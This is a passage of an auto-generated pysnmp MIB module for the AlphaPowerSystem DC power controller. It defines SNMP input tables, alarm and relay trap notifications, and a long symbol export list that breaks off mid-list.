if mibBuilder.loadTexts: dcPwrSysConvIpTable.setDescription('A table of Converter input variables.')
dcPwrSysConvIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysConvIpIndex"))
if mibBuilder.loadTexts: dcPwrSysConvIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpEntry.setDescription('An entry into the Converter input group.')
dcPwrSysConvIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpIndex.setDescription('The index of the Converter input variable in the table Converter input group.')
dcPwrSysConvIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpName.setDescription('The description of the Converter input variable as reported by the Converter input group.')
dcPwrSysConvIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpIntegerValue.setDescription('The integer value of the Converter input variable as reported by the Converter input group.')
dcPwrSysConvIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpStringValue.setDescription('The string value of the Converter input variable as reported by the Converter input group.')
dcPwrSysTimerIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTimerIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpCount.setDescription('Number of Timer input variables in system controller Timer input table.')
dcPwrSysTimerIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 2), )
if mibBuilder.loadTexts: dcPwrSysTimerIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpTable.setDescription('A table of Timer input variables')
dcPwrSysTimerIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysTimerIpIndex"))
if mibBuilder.loadTexts: dcPwrSysTimerIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpEntry.setDescription('An entry into the Timer input group')
dcPwrSysTimerIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTimerIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpIndex.setDescription('The index of the Timer input variable in the table Timer input group.')
dcPwrSysTimerIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTimerIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpName.setDescription('The description of the Timer input variable as reported by the Timer input group.')
dcPwrSysTimerIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTimerIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpIntegerValue.setDescription('The integer value of the Timer input variable as reported by the Timer input group.')
dcPwrSysTimerIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTimerIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpStringValue.setDescription('The string value of the Timer input variable as reported by the Timer input group.')
dcPwrSysCounterIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCounterIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpCount.setDescription('Number of Counter input variables in system controller Counter input table.')
dcPwrSysCounterIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 2), )
if mibBuilder.loadTexts: dcPwrSysCounterIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpTable.setDescription('A table of Counter input variables.')
dcPwrSysCounterIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysCounterIpIndex"))
if mibBuilder.loadTexts: dcPwrSysCounterIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpEntry.setDescription('An entry into the Counter input group.')
dcPwrSysCounterIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCounterIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpIndex.setDescription('The index of the Counter input variable in the table Counter input group.')
dcPwrSysCounterIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCounterIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpName.setDescription('The description of the Counter input variable as reported by the Counter input group.')
dcPwrSysCounterIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCounterIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpIntegerValue.setDescription('The integer value of the Counter input variable as reported by the Counter input group.')
dcPwrSysCounterIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCounterIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpStringValue.setDescription('The string value of the Counter input variable as reported by the Counter input group.')
dcPwrSysTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0))
dcPwrSysAlarmActiveTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 1)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmSeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"), ("AlphaPowerSystem-MIB", "dcPwrSysTimeStamp"), ("AlphaPowerSystem-MIB", "dcPwrSysAlarmTriggerValue"))
if mibBuilder.loadTexts: dcPwrSysAlarmActiveTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAlarmActiveTrap.setDescription('A trap issued when one of the alarms on the became active.')
dcPwrSysAlarmClearedTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 2)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmSeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"), ("AlphaPowerSystem-MIB", "dcPwrSysAlarmTriggerValue"))
if mibBuilder.loadTexts: dcPwrSysAlarmClearedTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAlarmClearedTrap.setDescription('A trap issued when one of the active alarms on the is cleared.')
dcPwrSysRelayTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 3)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRelayIntegerValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRelayStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRelayIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRelaySeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysRelayTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayTrap.setDescription('A trap issued from a change in state in one of the relays on the DC power system controller.')
dcPwrSysComOKTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 4)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysComOKTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysComOKTrap.setDescription('A trap to indicate that communications with a DC power system controller has been established.')
dcPwrSysComErrTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 5)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysComErrTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysComErrTrap.setDescription('A trap to indicate that communications with a DC power system controller has been lost.')
dcPwrSysAgentStartupTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 6)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysAgentStartupTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAgentStartupTrap.setDescription('A trap to indicate that the agent software has started up.')
dcPwrSysAgentShutdownTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 7)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysAgentShutdownTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAgentShutdownTrap.setDescription('A trap to indicate that the agent software has shutdown.')
dcPwrSysMajorAlarmActiveTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 8)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmSeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysMajorAlarmActiveTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMajorAlarmActiveTrap.setDescription('A trap issued as a summary of DC power system status. It is sent when the system goes into in Major Alarm')
dcPwrSysMajorAlarmClearedTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 9)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmSeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysMajorAlarmClearedTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMajorAlarmClearedTrap.setDescription('A trap issued as a summary of DC power system status. It is sent when the system comes out of Major Alarm')
dcPwrSysMinorAlarmActiveTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 10)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmSeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysMinorAlarmActiveTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMinorAlarmActiveTrap.setDescription('A trap issued as a summary of DC power system status. It is sent when the system goes into in Minor Alarm')
dcPwrSysMinorAlarmClearedTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 11)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmSeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysMinorAlarmClearedTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMinorAlarmClearedTrap.setDescription('A trap issued as a summary of DC power system status. It is sent when the system comes out of Minor Alarm')
dcPwrSysResyncAlarms = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 8, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: dcPwrSysResyncAlarms.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysResyncAlarms.setDescription('Send/Resend all active alarms that were previously sent through SNMP notification.')
dcPwrSysAlarmTriggerValue = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 9, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAlarmTriggerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAlarmTriggerValue.setDescription('')
dcPwrSysTimeStamp = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 9, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTimeStamp.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimeStamp.setDescription('')
mibBuilder.exportSymbols("AlphaPowerSystem-MIB", dcPwrSysAnalogOpTable=dcPwrSysAnalogOpTable, dcPwrSysDigAlrmStringValue=dcPwrSysDigAlrmStringValue, dcPwrSysCntrlrIpTable=dcPwrSysCntrlrIpTable, dcPwrSysDigAlrmCount=dcPwrSysDigAlrmCount, dcPwrSysAdioAlrmEntry=dcPwrSysAdioAlrmEntry, dcPwrSysTempAlrmTbl=dcPwrSysTempAlrmTbl, dcPwrSysMiscAlrmName=dcPwrSysMiscAlrmName, dcPwrSysConvAlrmStringValue=dcPwrSysConvAlrmStringValue, dcPwrSysSiteRegion=dcPwrSysSiteRegion, dcPwrSysRelayTable=dcPwrSysRelayTable, dcPwrSysTempAlrmIntegerValue=dcPwrSysTempAlrmIntegerValue, dcPwrSysCustomAlrmIntegerValue=dcPwrSysCustomAlrmIntegerValue, dcPwrSysVariable=dcPwrSysVariable, dcPwrSysCtrlAlrmCount=dcPwrSysCtrlAlrmCount, dcPwrSysRectAlrmSeverity=dcPwrSysRectAlrmSeverity, dcPwrSysResyncAlarms=dcPwrSysResyncAlarms, dcPwrSysRelayIndex=dcPwrSysRelayIndex, dcPwrSysMiscAlrmStringValue=dcPwrSysMiscAlrmStringValue, PYSNMP_MODULE_ID=alpha, dcPwrSysCustomAlrmEntry=dcPwrSysCustomAlrmEntry, dcPwrSysCntrlrIpTbl=dcPwrSysCntrlrIpTbl, dcPwrSysSoftwareVersion=dcPwrSysSoftwareVersion, dcPwrSysInvAlrmIntegerValue=dcPwrSysInvAlrmIntegerValue, dcPwrExternalControls=dcPwrExternalControls, dcPwrSysSystemNumber=dcPwrSysSystemNumber, dcPwrSysSiteNumber=dcPwrSysSiteNumber, dcPwrSysMajorAlarmClearedTrap=dcPwrSysMajorAlarmClearedTrap, dcPwrSysCtrlAlrmSeverity=dcPwrSysCtrlAlrmSeverity, dcPwrSysChargeAmps=dcPwrSysChargeAmps, dcPwrSysDigAlrmEntry=dcPwrSysDigAlrmEntry, dcPwrSysConvIpCount=dcPwrSysConvIpCount, dcPwrSysVoltAlrmIndex=dcPwrSysVoltAlrmIndex, dcPwrSysTempAlrmEntry=dcPwrSysTempAlrmEntry, dcPwrSysConvIpIndex=dcPwrSysConvIpIndex, dcPwrSysSystemSerial=dcPwrSysSystemSerial, dcPwrSysDischargeAmps=dcPwrSysDischargeAmps, dcPwrSysString=dcPwrSysString, dcPwrSysRectAlrmTable=dcPwrSysRectAlrmTable, dcPwrSysCustomAlrmName=dcPwrSysCustomAlrmName, dcPwrSysAgentShutdownTrap=dcPwrSysAgentShutdownTrap, dcPwrSysBattAlrmStringValue=dcPwrSysBattAlrmStringValue, dcPwrSysInvAlrmIndex=dcPwrSysInvAlrmIndex, 
dcPwrSysCounterIpCount=dcPwrSysCounterIpCount, dcPwrSysTimerIpIntegerValue=dcPwrSysTimerIpIntegerValue, dcPwrSysRelayTrap=dcPwrSysRelayTrap, dcPwrSysCustomAlrmIndex=dcPwrSysCustomAlrmIndex, dcPwrSysMiscAlrmSeverity=dcPwrSysMiscAlrmSeverity, dcPwrSysCounterIpTable=dcPwrSysCounterIpTable, dcPwrSysMiscAlrmIndex=dcPwrSysMiscAlrmIndex, dcPwrSysCounterIpEntry=dcPwrSysCounterIpEntry, dcPwrSysComOKTrap=dcPwrSysComOKTrap, dcPwrSysAnalogOpIndex=dcPwrSysAnalogOpIndex, dcPwrSysDigAlrmTable=dcPwrSysDigAlrmTable, dcPwrSysDigAlrmIndex=dcPwrSysDigAlrmIndex, dcPwrSysSiteCountry=dcPwrSysSiteCountry, dcPwrSysCurrAlrmStringValue=dcPwrSysCurrAlrmStringValue, dcPwrSysAdioAlrmIndex=dcPwrSysAdioAlrmIndex, dcPwrSysCustomIpTable=dcPwrSysCustomIpTable, dcPwrSysTimerIpName=dcPwrSysTimerIpName, dcPwrSysTimerIpStringValue=dcPwrSysTimerIpStringValue, dcPwrSysVoltAlrmIntegerValue=dcPwrSysVoltAlrmIntegerValue, dcPwrSysBattAlrmName=dcPwrSysBattAlrmName, dcPwrSysAdioAlrmSeverity=dcPwrSysAdioAlrmSeverity, dcPwrSysCntrlrIpStringValue=dcPwrSysCntrlrIpStringValue, dcPwrSysConvAlrmTbl=dcPwrSysConvAlrmTbl, dcPwrSysConvIpName=dcPwrSysConvIpName, dcPwrSysCntrlrIpCount=dcPwrSysCntrlrIpCount, dcPwrSysRectIpEntry=dcPwrSysRectIpEntry, dcPwrSysInvAlrmTable=dcPwrSysInvAlrmTable, dcPwrSysTimerIpIndex=dcPwrSysTimerIpIndex, dcPwrSysCounterIpIntegerValue=dcPwrSysCounterIpIntegerValue, dcPwrSysRectAlrmIntegerValue=dcPwrSysRectAlrmIntegerValue, dcPwrSysTempAlrmSeverity=dcPwrSysTempAlrmSeverity, dcPwrSysDigIpTbl=dcPwrSysDigIpTbl, dcPwrSysCtrlAlrmIndex=dcPwrSysCtrlAlrmIndex, dcPwrSysCntrlrIpName=dcPwrSysCntrlrIpName, dcPwrSysCustomIpCount=dcPwrSysCustomIpCount, dcPwrSysAlarmActiveTrap=dcPwrSysAlarmActiveTrap, dcPwrSysMinorAlarmClearedTrap=dcPwrSysMinorAlarmClearedTrap, dcPwrSysOutputsTbl=dcPwrSysOutputsTbl, dcPwrSysConvAlrmName=dcPwrSysConvAlrmName, dcPwrSysRectAlrmStringValue=dcPwrSysRectAlrmStringValue, dcPwrSysDigIpCount=dcPwrSysDigIpCount, dcPwrSysRectAlrmTbl=dcPwrSysRectAlrmTbl, 
dcPwrSysChargeVolts=dcPwrSysChargeVolts, dcPwrSysTrap=dcPwrSysTrap, dcPwrSysDigAlrmIntegerValue=dcPwrSysDigAlrmIntegerValue, dcPwrSysConvIpTbl=dcPwrSysConvIpTbl, dcPwrSysDigIpIndex=dcPwrSysDigIpIndex, dcPwrSysgCustomIpIntegerValue=dcPwrSysgCustomIpIntegerValue, dcPwrSysAdioAlrmName=dcPwrSysAdioAlrmName, dcPwrSysComErrTrap=dcPwrSysComErrTrap, dcPwrSysConvAlrmIndex=dcPwrSysConvAlrmIndex, dcPwrSysTempAlrmStringValue=dcPwrSysTempAlrmStringValue, dcPwrSysCntrlrIpIntegerValue=dcPwrSysCntrlrIpIntegerValue, dcPwrSysRectIpTable=dcPwrSysRectIpTable, dcPwrSysDigAlrmName=dcPwrSysDigAlrmName, dcPwrSysConvIpTable=dcPwrSysConvIpTable, dcPwrSysMiscAlrmEntry=dcPwrSysMiscAlrmEntry, dcPwrSysDevice=dcPwrSysDevice, dcPwrSysVoltAlrmStringValue=dcPwrSysVoltAlrmStringValue, dcPwrSysRectAlrmName=dcPwrSysRectAlrmName, dcPwrSysTimerIpEntry=dcPwrSysTimerIpEntry, dcPwrSysSystemType=dcPwrSysSystemType, dcPwrSysCtrlAlrmTable=dcPwrSysCtrlAlrmTable, dcPwrSysConvIpEntry=dcPwrSysConvIpEntry, dcPwrSysSiteCity=dcPwrSysSiteCity, dcPwrSysAnalogOpIntegerValue=dcPwrSysAnalogOpIntegerValue, dcPwrSysCtrlAlrmStringValue=dcPwrSysCtrlAlrmStringValue, dcPwrSysAnalogOpSeverity=dcPwrSysAnalogOpSeverity, dcPwrSysInvAlrmStringValue=dcPwrSysInvAlrmStringValue, dcPwrSysInvAlrmTbl=dcPwrSysInvAlrmTbl, dcPwrSysRectIpCount=dcPwrSysRectIpCount, dcPwrSysConvIpIntegerValue=dcPwrSysConvIpIntegerValue, dcPwrSysVoltAlrmCount=dcPwrSysVoltAlrmCount, dcPwrSysRectIpIndex=dcPwrSysRectIpIndex, dcPwrSysRectIpName=dcPwrSysRectIpName, dcPwrSysDigIpStringValue=dcPwrSysDigIpStringValue, dcPwrSysRectIpIntegerValue=dcPwrSysRectIpIntegerValue, dcPwrSysRelayStringValue=dcPwrSysRelayStringValue, dcPwrSysCustomIpEntry=dcPwrSysCustomIpEntry, dcPwrSysRectAlrmIndex=dcPwrSysRectAlrmIndex, dcPwrSysCurrAlrmTbl=dcPwrSysCurrAlrmTbl, dcPwrSysMiscAlrmCount=dcPwrSysMiscAlrmCount, dcPwrSysBattAlrmIndex=dcPwrSysBattAlrmIndex, dcPwrSysMinorAlarm=dcPwrSysMinorAlarm, dcPwrSysSoftwareTimestamp=dcPwrSysSoftwareTimestamp, dcPwrSysAdioAlrmTbl=dcPwrSysAdioAlrmTbl, 
dcPwrSysAdioAlrmIntegerValue=dcPwrSysAdioAlrmIntegerValue, alpha=alpha, dcPwrSysCurrAlrmIntegerValue=dcPwrSysCurrAlrmIntegerValue, dcPwrSysBattAlrmTable=dcPwrSysBattAlrmTable, dcPwrSysAlarmTriggerValue=dcPwrSysAlarmTriggerValue, dcPwrSysCurrAlrmCount=dcPwrSysCurrAlrmCount, dcPwrSysCurrAlrmEntry=dcPwrSysCurrAlrmEntry, dcPwrSysBattAlrmEntry=dcPwrSysBattAlrmEntry, dcPwrSysAdioAlrmStringValue=dcPwrSysAdioAlrmStringValue, dcPwrSysInvAlrmEntry=dcPwrSysInvAlrmEntry, dcPwrSysVoltAlrmSeverity=dcPwrSysVoltAlrmSeverity, dcPwrSysCounterIpName=dcPwrSysCounterIpName, dcPwrSysCurrAlrmSeverity=dcPwrSysCurrAlrmSeverity, dcPwrSysCntrlrIpEntry=dcPwrSysCntrlrIpEntry, dcPwrSysDigAlrmSeverity=dcPwrSysDigAlrmSeverity, dcPwrSysTimeStamp=dcPwrSysTimeStamp, dcPwrSysCustomAlrmTbl=dcPwrSysCustomAlrmTbl, dcPwrSysVoltAlrmTable=dcPwrSysVoltAlrmTable, dcPwrSysConvAlrmEntry=dcPwrSysConvAlrmEntry, dcPwrSysVoltAlrmEntry=dcPwrSysVoltAlrmEntry, dcPwrSysAnalogOpStringValue=dcPwrSysAnalogOpStringValue, dcPwrSysRelayTbl=dcPwrSysRelayTbl, dcPwrSysDischargeVolts=dcPwrSysDischargeVolts, dcPwrSysVoltAlrmName=dcPwrSysVoltAlrmName, dcPwrSysConvIpStringValue=dcPwrSysConvIpStringValue, dcPwrSysCtrlAlrmEntry=dcPwrSysCtrlAlrmEntry, dcPwrSysBattAlrmTbl=dcPwrSysBattAlrmTbl, dcPwrSysInputsTbl=dcPwrSysInputsTbl, dcPwrSysRectAlrmEntry=dcPwrSysRectAlrmEntry, dcPwrSysAgentStartupTrap=dcPwrSysAgentStartupTrap, dcPwrSysMajorAlarmActiveTrap=dcPwrSysMajorAlarmActiveTrap, dcPwrSysBattAlrmCount=dcPwrSysBattAlrmCount, dcPwrVarbindNameReference=dcPwrVarbindNameReference, dcPwrSysCustomAlrmCount=dcPwrSysCustomAlrmCount, dcPwrSysBattAlrmIntegerValue=dcPwrSysBattAlrmIntegerValue, dcPwrSysInvAlrmCount=dcPwrSysInvAlrmCount, dcPwrSysTempAlrmName=dcPwrSysTempAlrmName, dcpower=dcpower, dcPwrSysCustomAlrmSeverity=dcPwrSysCustomAlrmSeverity, dcPwrSysTempAlrmTable=dcPwrSysTempAlrmTable, dcPwrSysRectIpTbl=dcPwrSysRectIpTbl, dcPwrSysMajorAlarm=dcPwrSysMajorAlarm, dcPwrSysCustomAlrmStringValue=dcPwrSysCustomAlrmStringValue, 
dcPwrSysCurrAlrmIndex=dcPwrSysCurrAlrmIndex, dcPwrSysConvAlrmIntegerValue=dcPwrSysConvAlrmIntegerValue, dcPwrSysInvAlrmSeverity=dcPwrSysInvAlrmSeverity, dcPwrSysTimerIpTbl=dcPwrSysTimerIpTbl, dcPwrSysDigIpIntegerValue=dcPwrSysDigIpIntegerValue, dcPwrSysRelayIntegerValue=dcPwrSysRelayIntegerValue, dcPwrSysAlrmsTbl=dcPwrSysAlrmsTbl, dcPwrSysRelayEntry=dcPwrSysRelayEntry, dcPwrSysCurrAlrmName=dcPwrSysCurrAlrmName, dcPwrSysCtrlAlrmIntegerValue=dcPwrSysCtrlAlrmIntegerValue, dcPwrSysTimerIpTable=dcPwrSysTimerIpTable, dcPwrSysCustomIpStringValue=dcPwrSysCustomIpStringValue, dcPwrSysConvAlrmSeverity=dcPwrSysConvAlrmSeverity, dcPwrSysAdioAlrmTable=dcPwrSysAdioAlrmTable, dcPwrSysDigAlrmTbl=dcPwrSysDigAlrmTbl, dcPwrSysAdioAlrmCount=dcPwrSysAdioAlrmCount, dcPwrSysAnalogOpName=dcPwrSysAnalogOpName, dcPwrSysCustomIpTbl=dcPwrSysCustomIpTbl, dcPwrSysCounterIpStringValue=dcPwrSysCounterIpStringValue, dcPwrSysMiscAlrmIntegerValue=dcPwrSysMiscAlrmIntegerValue, dcPwrSysRelayCount=dcPwrSysRelayCount, dcPwrSysRectIpStringValue=dcPwrSysRectIpStringValue, dcPwrSysDigIpEntry=dcPwrSysDigIpEntry, dcPwrSysAnalogOpEntry=dcPwrSysAnalogOpEntry, dcPwrSysBattAlrmSeverity=dcPwrSysBattAlrmSeverity, dcPwrSysMiscAlrmTable=dcPwrSysMiscAlrmTable, dcPwrSysRelayName=dcPwrSysRelayName, dcPwrSysAnalogOpCount=dcPwrSysAnalogOpCount, dcPwrSysCounterIpIndex=dcPwrSysCounterIpIndex, dcPwrSysInvAlrmName=dcPwrSysInvAlrmName, dcPwrSysConvAlrmCount=dcPwrSysConvAlrmCount, dcPwrSysCurrAlrmTable=dcPwrSysCurrAlrmTable, dcPwrSysVoltAlrmTbl=dcPwrSysVoltAlrmTbl, dcPwrSysAnalogOpTbl=dcPwrSysAnalogOpTbl, dcPwrSysMiscAlrmTbl=dcPwrSysMiscAlrmTbl, dcPwrSysContactName=dcPwrSysContactName, dcPwrSysTempAlrmCount=dcPwrSysTempAlrmCount, dcPwrSysTraps=dcPwrSysTraps, dcPwrSysCounterIpTbl=dcPwrSysCounterIpTbl, dcPwrSysConvAlrmTable=dcPwrSysConvAlrmTable, dcPwrSysCustomIpIndex=dcPwrSysCustomIpIndex, dcPwrSysSiteName=dcPwrSysSiteName, dcPwrSysRelaySeverity=dcPwrSysRelaySeverity, dcPwrSysCtrlAlrmTbl=dcPwrSysCtrlAlrmTbl, 
